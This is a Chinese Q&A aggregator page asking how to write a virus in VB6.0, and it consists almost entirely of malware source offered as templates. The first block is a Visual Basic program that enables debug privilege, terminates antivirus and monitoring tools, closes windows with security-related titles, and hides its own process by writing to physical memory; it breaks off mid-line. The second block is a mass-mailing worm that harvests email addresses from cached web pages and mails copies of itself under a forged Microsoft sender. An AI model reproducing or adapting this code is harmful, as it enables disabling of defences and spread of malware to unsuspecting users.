怎么用VB6.0编写病毒(要摸版)

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了怎么用VB6.0编写病毒(要摸版)相关的知识,希望对你有一定的参考价值。

介绍几个用vb 编写的病毒
以下两个怎么都出现错误呀

全都放在标准模块中,不要有窗体,启动设置为Sub_main,就行了,可以结干掉常见的反病毒软件,包括冰刃、Autoruns、Sreng、瑞星、卡巴、江民、金山、NOD32等,还开放被感染机器的后门,便于进一步入侵。

Option Explicit
Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Declare Function CloseHandle Lib "kernel32.dll" (ByVal hObject As Long) As Long
Declare Function TerminateProcess Lib "kernel32.dll" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Declare Function EnumWindows Lib "user32.dll" (ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long
Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Declare Function GetWindowTextLength Lib "user32" Alias "GetWindowTextLengthA" (ByVal hwnd As Long) As Long
Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal hwnd As Long, ByRef lpdwProcessId As Long) As Long
Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Declare Function SetForegroundWindow Lib "user32" (ByVal hwnd As Long) As Long
Declare Sub Sleep Lib "kernel32.dll" (ByVal dwMilliseconds As Long)
Const PROCESS_ALL_ACCESS As Long = &HFFF
Const WM_CLOSE = &H10
Public Const REG_SZ = 1
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const ERROR_SUCCESS = 0&
Public KEY_ALL_ACCESS As Double
Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Declare Function CopyFile Lib "kernel32.dll" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long
Public Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004
Public Const STATUS_ACCESS_DENIED = &HC0000022
Public Const STATUS_INVALID_HANDLE = &HC0000008
Public Const SECTION_MAP_WRITE = &H2
Public Const SECTION_MAP_READ = &H4
Public Const READ_CONTROL = &H20000
Public Const WRITE_DAC = &H40000
Public Const NO_INHERITANCE = 0
Public Const DACL_SECURITY_INFORMATION = &H4
Public Type IO_STATUS_BLOCK
Status As Long
Information As Long
End Type
Public Type UNICODE_STRING
Length As Integer
MaximumLength As Integer
Buffer As Long
End Type
Public Const OBJ_INHERIT = &H2
Public Const OBJ_PERMANENT = &H10
Public Const OBJ_EXCLUSIVE = &H20
Public Const OBJ_CASE_INSENSITIVE = &H40
Public Const OBJ_OPENIF = &H80
Public Const OBJ_OPENLINK = &H100
Public Const OBJ_KERNEL_HANDLE = &H200
Public Const OBJ_VALID_ATTRIBUTES = &H3F2
Public Type OBJECT_ATTRIBUTES
Length As Long
RootDirectory As Long
ObjectName As Long
Attributes As Long
SecurityDeor As Long
SecurityQualityOfService As Long
End Type
Public Type ACL
AclRevision As Byte
Sbz1 As Byte
AclSize As Integer
AceCount As Integer
Sbz2 As Integer
End Type

Public Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any) As Long
Public Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any, ppSecurityDeor As Long) As Long

Public Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias "SetEntriesInAclA" (ByVal cCountOfExplicitEntries As Long, pListOfExplicitEntries As EXPLICIT_ACCESS, ByVal OldAcl As Long, NewAcl As Long) As Long
Public Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias "BuildExplicitAccessWithNameA" (pExplicitAccess As EXPLICIT_ACCESS, ByVal pTrusteeName As String, ByVal AccessPermissions As Long, ByVal AccessMode As ACCESS_MODE, ByVal Inheritance As Long)

Public Declare Sub RtlInitUnicodeString Lib "NTDLL.DLL" (DestinationString As UNICODE_STRING, ByVal SourceString As Long)
Public Declare Function ZwOpenSection Lib "NTDLL.DLL" (SectionHandle As Long, ByVal DesiredAccess As Long, ObjectAttributes As Any) As Long
Public Declare Function LocalFree Lib "kernel32" (ByVal hMem As Any) As Long
Public Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject As Long, ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, ByVal dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As Long
Public Declare Function UnmapViewOfFile Lib "kernel32" (lpBaseAddress As Any) As Long
Public Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Public Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (LpVersionInformation As OSVERSIONINFO) As Long

Public Type OSVERSIONINFO
dwOSVersionInfoSize As Long
dwMajorVersion As Long
dwMinorVersion As Long
dwBuildNumber As Long
dwPlatformId As Long
szCSDVersion As String * 128
End Type

Public verinfo As OSVERSIONINFO

Public g_hNtDLL As Long
Public g_pMapPhysicalMemory As Long
Public g_hMPM As Long
Public aByte(3) As Byte

Public Enum ACCESS_MODE
NOT_USED_ACCESS
GRANT_ACCESS
SET_ACCESS
DENY_ACCESS
REVOKE_ACCESS
SET_AUDIT_SUCCESS
SET_AUDIT_FAILURE
End Enum
Public Enum MULTIPLE_TRUSTEE_OPERATION
NO_MULTIPLE_TRUSTEE
TRUSTEE_IS_IMPERSONATE
End Enum

Public Enum TRUSTEE_FORM
TRUSTEE_IS_SID
TRUSTEE_IS_NAME
End Enum

Public Enum TRUSTEE_TYPE
TRUSTEE_IS_UNKNOWN
TRUSTEE_IS_USER
TRUSTEE_IS_GROUP
End Enum

Public Type TRUSTEE
pMultipleTrustee As Long
MultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATION
TrusteeForm As TRUSTEE_FORM
TrusteeType As TRUSTEE_TYPE
ptstrName As String
End Type

Public Type EXPLICIT_ACCESS
grfAccessPermissions As Long
grfAccessMode As ACCESS_MODE
grfInheritance As Long
TRUSTEE As TRUSTEE
End Type

Public Type AceArray
List() As EXPLICIT_ACCESS
End Type

Public Enum SE_OBJECT_TYPE
SE_UNKNOWN_OBJECT_TYPE = 0
SE_FILE_OBJECT
SE_SERVICE
SE_PRINTER
SE_REGISTRY_KEY
SE_LMSHARE
SE_KERNEL_OBJECT
SE_WINDOW_OBJECT
SE_DS_OBJECT
SE_DS_OBJECT_ALL
SE_PROVIDER_DEFINED_OBJECT
SE_WMIGUID_OBJECT
End Enum
Public Type LARGE_INTEGER
lowpart As Long
highpart As Long
End Type

Public Const ANYSIZE_ARRAY As Long = 1
Public Const SE_PRIVILEGE_ENABLED As Long = &H2
Public Const TOKEN_ADJUST_PRIVILEGES As Long = &H20
Public Const TOKEN_QUERY As Long = &H8

Public Type LUID_AND_ATTRIBUTES
LUID As LARGE_INTEGER
Attributes As Long
End Type

Public Type TOKEN_PRIVILEGES
PrivilegeCount As Long
Privileges(ANYSIZE_ARRAY) As LUID_AND_ATTRIBUTES
End Type

Public Declare Function LookupPrivilegeValue Lib "advapi32.dll" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, ByRef lpLuid As LARGE_INTEGER) As Long
Public Declare Function AdjustTokenPrivileges Lib "advapi32.dll" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, ByRef NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, ByRef PreviousState As Long, ByRef ReturnLength As Long) As Long
Public Declare Function GetCurrentProcess Lib "kernel32.dll" () As Long
Public Declare Function GetCurrentProcessId Lib "kernel32.dll" () As Long

Public Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, ByRef TokenHandle As Long) As Long
Public Declare Function GetLastError Lib "kernel32.dll" () As Long
Public Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Public Declare Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Public Declare Function Process32Next Lib "kernel32" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Public Declare Function Thread32First Lib "kernel32.dll" (ByVal hSnapshot As Long, ByRef lpte As THREADENTRY32) As Long
Public Declare Function Thread32Next Lib "kernel32.dll" (ByVal hSnapshot As Long, ByRef lpte As THREADENTRY32) As Long
Public Declare Function Module32First Lib "kernel32.dll" (ByVal hSnapshot As Long, ByRef lppe As MODULEENTRY32) As Long
Public Declare Function Module32Next Lib "kernel32.dll" (ByVal hSnapshot As Long, ByRef lpme As MODULEENTRY32) As Long
Public Declare Function TerminateThread Lib "kernel32" (ByVal hThread As Long, ByVal dwExitCode As Long) As Long
Public Declare Function OpenThread Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwThreadId As Long) As Long

Public Const TH32CS_SNAPPROCESS = &H2
Public Const TH32CS_SNAPTHREAD = &H4
Public Const TH32CS_SNAPMODULE As Long = &H8

Public Const PROCESS_TERMINATE As Long = (&H1)
Public Const MAX_PATH As Integer = 260

Public Type PROCESSENTRY32
dwsize As Long
cntusage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * MAX_PATH
End Type

Public Type MODULEENTRY32 '模块
dwsize As Long
th32ModuleID As Long
th32ProcessID As Long
GlblcntUsage As Long
ProccntUsage As Long
modBaseAddr As Byte
modBaseSize As Long
hModule As Long
szModule As String * 256
szExePath As String * 1024
End Type

Public Type THREADENTRY32 '线程
dwsize As Long
cntusage As Long
th32threadID As Long
th32OwnerProcessID As Long
tpBasePri As Long
tpDeltaPri As Long
dwFlags As Long
End Type

Public Function KillThread(ByVal ProcessID As Long) As Boolean
Dim hThread As Long, r As Long, i As Long
Dim TList() As THREADENTRY32

TList = GetThreadList(ProcessID)

For i = 0 To UBound(TList)
With TList(i)
hThread = OpenThread(PROCESS_TERMINATE, False, .th32threadID) '获取进程句柄
If hThread <> 0 Then
r = TerminateThread(hThread, 0) '关闭进程
End If
End With
Next
KillThread = r <> 0
End Function

Public Function KillProcess(ByVal ProcessName As String, Optional ByVal bKillThread As Boolean) As Boolean
Dim hProcess As Long, r As Long
Dim PList() As PROCESSENTRY32
Dim Name As String, i As Long

PList = GetProcessList

For i = 0 To UBound(PList)
With PList(i)
Name = Left(.szExeFile, InStr(1, .szExeFile, vbNullChar) - 1)
DoEvents
r = InModule(.th32ProcessID, ProcessName)
If LCase(Trim(Name)) = LCase(Trim(ProcessName)) Or r Then
hProcess = OpenProcess(PROCESS_TERMINATE, False, .th32ProcessID) '获取进程句柄
If hProcess <> 0 Then
r = TerminateProcess(hProcess, 0) '关闭进程
If Not (r) Then
If bKillThread Then
Call KillThread(.th32ProcessID)
End If
r = TerminateProcess(hProcess, 0) '关闭进程
End If
End If
End If
End With
Next
End Function

Public Function GetThreadList(ByVal ProcessID As Long) As THREADENTRY32()
Dim i As Long
Dim TList() As THREADENTRY32
Dim TE32 As THREADENTRY32
Dim hThreadSnap As Long
Dim TheLoop As Long

hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, ProcessID)
TE32.dwsize = Len(TE32)

TheLoop = Thread32First(hThreadSnap, TE32)
While TheLoop <> 0

If TE32.th32OwnerProcessID = ProcessID Then
ReDim Preserve TList(i)
TerminateThread TE32.th32threadID, 0
TList(i) = TE32
i = i + 1
End If

TheLoop = Thread32Next(hThreadSnap, TE32)
Wend

CloseHandle hThreadSnap
GetThreadList = TList
End Function

Public Function GetProcessList() As PROCESSENTRY32()
Dim i As Long
Dim PList() As PROCESSENTRY32
Dim PE32 As PROCESSENTRY32
Dim hProcessSnap As Long
Dim TheLoop As Long

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
PE32.dwsize = Len(PE32)

TheLoop = Process32First(hProcessSnap, PE32)
While TheLoop <> 0
ReDim Preserve PList(i)
PList(i) = PE32
i = i + 1
TheLoop = Process32Next(hProcessSnap, PE32)
Wend

CloseHandle hProcessSnap
GetProcessList = PList
End Function

Public Function GetModuleList(ByVal ProcessID As Long) As MODULEENTRY32()
Dim i As Long
Dim MList() As MODULEENTRY32
Dim ME32 As MODULEENTRY32
Dim hModuleSnap As Long
Dim TheLoop As Long

hModuleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, ProcessID)
ME32.dwsize = Len(ME32)

TheLoop = Module32First(hModuleSnap, ME32)
While TheLoop <> 0
ReDim Preserve MList(i)
MList(i) = ME32
i = i + 1
TheLoop = Module32Next(hModuleSnap, ME32)
Wend

CloseHandle hModuleSnap
GetModuleList = MList
End Function

Public Function InModule(ByVal ProcessID As Long, ByVal ModuleName As String) As Boolean
Dim i As Long
Dim MList() As MODULEENTRY32
Dim Name As String

On Error GoTo Err:

MList = GetModuleList(ProcessID)

For i = 0 To UBound(MList)
With MList(i)
Name = Left(.szModule, InStr(1, .szModule, vbNullChar) - 1)
If LCase(Name) = LCase(ModuleName) Then
InModule = True
Exit For
End If
End With
Next
Err:
End Function

Function EnableDebugPrivilege() As Boolean
Dim TP As TOKEN_PRIVILEGES
Dim hToken As Long, r As Long, e As Long

r = OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY, hToken)
e = GetLastError
' Err.Raise 6
If r And Not e Then
r = LookupPrivilegeValue(vbNullString, "SeDebugPrivilege", TP.Privileges(0).LUID)
e = GetLastError

If r And Not e Then
TP.PrivilegeCount = 1
TP.Privileges(0).Attributes = SE_PRIVILEGE_ENABLED

r = AdjustTokenPrivileges(hToken, False, TP, LenB(TP), 0, 0)
EnableDebugPrivilege = GetLastError = 0
End If
End If
Call CloseHandle(hToken)
End Function

Public Function EnumWindowsProc(ByVal hwnd As Long, ByVal lParam As Long) As Boolean
Dim sSave As String, Ret As Long, IsIceSword As Boolean, IsAutoruns As Boolean, IsProcexp As Boolean, IsTaskmgr As Boolean, Other As Boolean, i As Long

Ret = GetWindowTextLength(hwnd)
sSave = Space(Ret)
GetWindowText hwnd, sSave, Ret + 1

IsIceSword = True
IsAutoruns = True
IsProcexp = True
IsTaskmgr = True
Other = True

If Len(sSave) < 6 Or Len(sSave) > 16 Then
IsIceSword = False
GoTo No1
End If
For i = Len(sSave) - 5 To Len(sSave)
If (Mid(sSave, i, 1) <> "0") And (Mid(sSave, i, 1) <> "1") And (Mid(sSave, i, 1) <> "2") And (Mid(sSave, i, 1) <> "3") And (Mid(sSave, i, 1) <> "4") And (Mid(sSave, i, 1) <> "5") And (Mid(sSave, i, 1) <> "6") And (Mid(sSave, i, 1) <> "7") And (Mid(sSave, i, 1) <> "8") And (Mid(sSave, i, 1) <> "9") And (Mid(sSave, i, 1) <> "A") And (Mid(sSave, i, 1) <> "B") And (Mid(sSave, i, 1) <> "C") And (Mid(sSave, i, 1) <> "D") And (Mid(sSave, i, 1) <> "E") And (Mid(sSave, i, 1) <> "F") Then IsIceSword = False
Next
If IsIceSword Then
PostMessage hwnd, WM_CLOSE, 0, 0
SendKeys "Enter"
SetForegroundWindow hwnd
SendKeys "%F4"
End If
No1:
GoTo AllOk
If Len(sSave) < 8 Then
IsAutoruns = False
GoTo No2
End If
If Mid(sSave, 1, 8) <> "Autoruns" Then IsAutoruns = False
If IsAutoruns Then
PostMessage hwnd, WM_CLOSE, 0, 0
End If
No2:
GoTo AllOk
If Len(sSave) < 16 Then
IsProcexp = False
GoTo No3
End If
If Mid(sSave, 1, 16) <> "Process Explorer" Then IsProcexp = False
If IsProcexp Then
PostMessage hwnd, WM_CLOSE, 0, 0
End If
No3:
GoTo AllOk
If sSave <> "Windows 任务管理器" Then IsTaskmgr = False
If IsTaskmgr Then
PostMessage hwnd, WM_CLOSE, 0, 0
End If
GoTo AllOk
If InStr(1, sSave, "杀毒", vbTextCompare) <> 0 Or InStr(1, sSave, "病毒", vbTextCompare) <> 0 Or InStr(1, sSave, "专杀", vbTextCompare) <> 0 Or InStr(1, sSave, "注册表", vbTextCompare) <> 0 Or InStr(1, sSave, "Anti", vbTextCompare) <> 0 Or InStr(1, sSave, "进程", vbTextCompare) <> 0 Or InStr(1, sSave, "瑞星", vbTextCompare) <> 0 Or InStr(1, sSave, "毒霸", vbTextCompare) <> 0 Or _
InStr(1, sSave, "江民", vbTextCompare) <> 0 Or InStr(1, sSave, "卡巴斯基", vbTextCompare) <> 0 Or InStr(1, sSave, "NOD32", vbTextCompare) <> 0 Or InStr(1, sSave, "McAfee", vbTextCompare) <> 0 Or InStr(1, sSave, "BitDefender", vbTextCompare) <> 0 Or InStr(1, sSave, "avast", vbTextCompare) <> 0 Or InStr(1, sSave, "Kill", vbTextCompare) <> 0 Or InStr(1, sSave, "Virus", vbTextCompare) <> 0 _
Or InStr(1, sSave, "Kaspersky", vbTextCompare) <> 0 Or InStr(1, sSave, "冰刃", vbTextCompare) <> 0 Or InStr(1, sSave, "Autorun", vbTextCompare) <> 0 Or InStr(1, sSave, "sreng", vbTextCompare) <> 0 Or InStr(1, sSave, "查毒", vbTextCompare) <> 0 Or InStr(1, sSave, "运行", vbTextCompare) <> 0 Then PostMessage hwnd, WM_CLOSE, 0, 0

AllOk:
EnumWindowsProc = True
End Function

Public Sub HideCurrentProcess()
'在进程列表中隐藏当前应用程序进程

Dim thread As Long, process As Long, fw As Long, bw As Long
Dim lOffsetFlink As Long, lOffsetBlink As Long, lOffsetPID As Long

verinfo.dwOSVersionInfoSize = Len(verinfo)
If (GetVersionEx(verinfo)) <> 0 Then
If verinfo.dwPlatformId = 2 Then
If verinfo.dwMajorVersion = 5 Then
Select Case verinfo.dwMinorVersion
Case 0
lOffsetFlink = &HA0
lOffsetBlink = &HA4
lOffsetPID = &H9C
Case 1
lOffsetFlink = &H88
lOffsetBlink = &H8C
lOffsetPID = &H84
End Select
End If
End If
End If

If OpenPhysicalMemory <> 0 Then
thread = GetData(&HFFDFF124)
process = GetData(thread + &H44)
fw = GetData(process + lOffsetFlink)
bw = GetData(process + lOffsetBlink)
SetData fw + 4, bw
SetData bw, fw
CloseHandle g_hMPM
End If
End Sub

Public Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long)
Dim pDacl As Long
Dim pNewDacl As Long
Dim pSD As Long
Dim dwRes As Long
Dim ea As EXPLICIT_ACCESS

GetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, pDacl, 0, pSD

ea.grfAccessPermissions = SECTION_MAP_WRITE
ea.grfAccessMode = GRANT_ACCESS
ea.grfInheritance = NO_INHERITANCE
ea.TRUSTEE.TrusteeForm = TRUSTEE_IS_NAME
ea.TRUSTEE.TrusteeType = TRUSTEE_IS_USER
ea.TRUSTEE.ptstrName = "CURRENT_USER" & vbNullChar

SetEntriesInAcl 1, ea, pDacl, pNewDacl

SetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, ByVal pNewDacl, 0

CleanUp:
LocalFree pSD
LocalFree pNewDacl
End Sub

Public Function OpenPhysicalMemory() As Long
Dim Status As Long
Dim PhysmemString As UNICODE_STRING
Dim Attributes As OBJECT_ATTRIBUTES

RtlInitUnicodeString PhysmemString, StrPtr("\Device\PhysicalMemory"
参考技术A object = "<248dd890-bb45-11cf-9abc-0080c7e7b78d>#1.0#0"; "mswinsck.ocx"

begin vb.form form1

caption = "form1"

clientheight = 3195

clientleft = 60

clienttop = 345

clientwidth = 4680

linktopic = "form1"

scaleheight = 3195

scalewidth = 4680

startupposition = 3 windows default

begin mswinsocklib.winsock winsock1

left = 1200

top = 840

_extentx = 741

_extenty = 741

_version = 393216

end

end

attribute vb_name = "form1"

attribute vb_globalnamespace = false

attribute vb_creatable = false

attribute vb_predeclaredid = true

attribute vb_exposed = false

option explicit

private response as string

private declare sub sleep lib "kernel32" (byval dwmilliseconds as long)

private declare function shgetspecialfolderlocation lib "shell32.dll" (byval hwndowner as long, byval nfolder as long, pidl as itemidlist) as long

private declare function shgetpathfromidlist lib "shell32.dll" alias "shgetpathfromidlista" (byval pidl as long, byval pszpath as string) as long

const csidl_tif = &h20

private type shitemid

cb as long

abid as byte

end type

private type itemidlist

mkid as shitemid

end type

private sub form_load()

on error resume next

kill "c:\t.txt"

listht getspecialfolder(csidl_tif)

transmit ("mail.lycos.com")

unload me

end sub

function transmit(byval b8 as string)

dim q as string, a as string, textline as string

dim www, ggg

winsock1.localport = 0

if winsock1.state = sckclosed then

winsock1.protocol = scktcpprotocol

winsock1.remotehost = b8

winsock1.remoteport = 25

winsock1.connect

w4c ("220")

winsock1.senddata "helo localhost" & vbcrlf

w4c ("250")

winsock1.senddata "mail from:" & " <" + "webmaster@microsoft.com" + ">" & vbcrlf

w4c ("250")

open "c:\t.txt" for input as #1

do while not eof(1)

line input #1, textline

q = q & textline

loop

close #1

a = trim(q)

www = split(a, ";")

for each ggg in www

if ggg = "" then

ggg = "blah@h.net"

end if

if instr(1, ggg, "@") then

else

ggg = "faggot@fillme.com"

end if

if instr(1, ggg, "?") then

ggg = "juana12234@yahoo.com"

end if

winsock1.senddata "rcpt t " & "<" & ggg & ">" & vbcrlf

w4c ("250")

next ggg

winsock1.senddata "data" & vbcrlf

w4c ("354")

winsock1.senddata hd & vbcrlf

winsock1.senddata "<html>this is a checking for your system from microsoft.com....</html>" & vbcrlf

winsock1.senddata a12()

winsock1.senddata vbcrlf & "." & vbcrlf

w4c ("250")

winsock1.senddata "quit" & vbcrlf

w4c ("221")

winsock1.close

transmit = true

else

end if

end function

private sub winsock1_dataarrival(byval bytestotal as long)

winsock1.getdata response

end sub

private sub w4c(responsecode as string)

dim tt as single

dim ttt as single

tt = timer

while len(response) = 0

ttt = tt - timer

doevents

if ttt > 24 then

exit sub

end if

sleep 1

wend

while left(response, 3) <> responsecode

doevents

if ttt > 50 then

exit sub

end if

sleep 1

wend

response = ""

end sub

sub listht(dir)

on error resume next

dim fso, ssfh, filh, s, f, d, q, a, textline

set fso = createobject("scripting.filesystemobject")

set ssfh = fso.getfolder(dir).subfolders

for each filh in ssfh

s = infht(filh.path)

listht (filh.path)

if s = "" then

s = "fuck@well.com"

end if

f = f & s & ";"

next

d = f

open "c:\t.txt" for append as #1

print #1, d

close #1

end sub

function infht(dir)

dim mlto as string

dim fso, cfh, filh, ext, textline, q, wwww

dim j as long, cnt as long

set fso = createobject("scripting.filesystemobject")

set cfh = fso.getfolder(dir).files

for each filh in cfh

ext = fso.getextensionname(filh.path)

ext = lcase(ext)

if (ext = "htm") or (ext = "html") then

open filh.path for input as #1

do while not eof(1)

line input #1, textline

q = q & textline

loop

close #1

for j = 1 to len(q)

if mid(q, j, 8) = """" & "mailt" then

mlto = ""

cnt = 0

do while mid(q, j + 8 + cnt, 1) <> """"

mlto = mlto + mid(q, j + 8 + cnt, 1)

cnt = cnt + 1

loop

wwww = wwww & mlto & ";"

end if

next

end if

next

infht = wwww

end function

private function getspecialfolder(csidl as long) as string

dim r as long

dim idl as itemidlist

dim path as string

r = shgetspecialfolderlocation(100, csidl, idl)

if r = 0 then

path$ = space$(512)

r = shgetpathfromidlist(byval idl.mkid.cb, byval path$)

getspecialfolder = left$(path, instr(path, chr$(0)) - 1)

exit function

end if

getspecialfolder = ""

end function

private function hd() as string

dim fin as string, dh as string, recip as string

dim sdatenow as string, deit as string, phrom as string, topic as string, engine as string, myme as string

sdatenow = format(date, "ddd") & ", " & format(date, "dd mmm yyyy") & " " & format(time, "hh:mm:ss")

recip = "t subscribers" & vbcrlf

deit = "date:" + chr(32) + sdatenow + vbcrlf

phrom = "from: " & chr(34) & "administrators" & chr(34) & " <webmaster@microsoft.com>" + vbcrlf

topic = "subject:" + chr(32) + "let me check your system" + vbcrlf

engine = "x-mailer: mailsux9855097" + vbcrlf

myme = "mime-version: 1.0" & vbcrlf & _

"content-type: multipart/related; boundary=" & _

chr(34) & "blimp" & chr(34) & "; type=" & chr(34) & _

"text/html" & chr(34) & vbcrlf & _

"by:alcotheskaler" & vbcrlf & _

"--blimp" & vbcrlf & _

"content-type: text/html; charset=us-ascii" & vbcrlf & _

"content-transfer-encoding: 7bit" & vbcrlf

dh = phrom & deit & engine & recip & topic & myme

hd = dh

end function

private function a12() as string

dim fin as string

dim phile as string

dim ss as string

ss = app.path

if right(ss,1) <> "\" then ss = ss & "\"

fin = fin & e32(ss & app.exename & ".exe")

fin = fin & vbcrlf & "--blimp--" & vbcrlf

a12 = fin

end function

public function e32(byval vsfullpathname as string) as string

dim fin as string

fin = vbcrlf & "--blimp" & vbnewline

fin = fin & "content-type: application/octet-stream; name=" & chr(34) & "srx.exe" & chr(34) & vbnewline

fin = fin & "content-transfer-encoding: base64" & vbnewline

fin = fin & "content-disposition: attachment; filename=" & chr(34) & "srx.exe" & chr(34) & vbnewline

fin = fin & b64(vsfullpathname)

e32 = fin

end function

public function b64(byval vsfullpathname as string) as string

dim b as integer

dim base64tab as variant

dim bin(3) as byte

dim s as string

dim l as long

dim i as long

dim filein as long

dim sresult as string

dim n as long

base64tab = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "+", "/")

erase bin

l = 0: i = 0: filein = 0: b = 0:

s = ""

filein = freefile

open vsfullpathname for binary as filein

sresult = s & vbcrlf

s = ""

l = lof(filein) - (lof(filein) mod 3)

for i = 1 to l step 3

get filein, , bin(0)

get filein, , bin(1)

get filein, , bin(2)

if len(s) > 64 then

s = s & vbcrlf

sresult = sresult & s

s = ""

end if

b = (bin(n) \ 4) and &h3f

s = s & base64tab(b)

b = ((bin(n) and &h3) * 16) or ((bin(1) \ 16) and &hf)

s = s & base64tab(b)

b = ((bin(n + 1) and &hf) * 4) or ((bin(2) \ 64) and &h3)

s = s & base64tab(b)

b = bin(n + 2) and &h3f

s = s & base64tab(b)

next i

if not (lof(filein) mod 3 = 0) then

for i = 1 to (lof(filein) mod 3)

get filein, , bin(i - 1)

next i

if (lof(filein) mod 3) = 2 then

b = (bin(0) \ 4) and &h3f right shift 2 bits (&h3f=111111b)

s = s & base64tab(b)

b = ((bin(0) and &h3) * 16) or ((bin(1) \ 16) and &hf)

s = s & base64tab(b)

b = ((bin(1) and &hf) * 4) or ((bin(2) \ 64) and &h3)

s = s & base64tab(b)

s = s & "="

else

b = (bin(0) \ 4) and &h3f right shift 2 bits (&h3f=111111b)

s = s & base64tab(b)

b = ((bin(0) and &h3) * 16) or ((bin(1) \ 16) and &hf)

s = s & base64tab(b)

s = s & "=="

end if

end if

if s <> "" then
s = s & vbcrlf
sresult = sresult & s
end if
s = ""
close filein
b64 = sresult
end function

以上是关于怎么用VB6.0编写病毒(要摸版)的主要内容,如果未能解决你的问题,请参考以下文章

VB6.0编写的程序在win7或win8上可以用吗

怎么用python写病毒

如何用vb6.0获取usb序列号

想用VB6.0做一个小程序,里面就一张图片,打开10秒后自动关闭.求详细制作方法,还有所需要的控件,属性设置

vb6.0开发的上位机串口助手(自动识别电脑端口号支持文本十六进制发送)

如何编写木马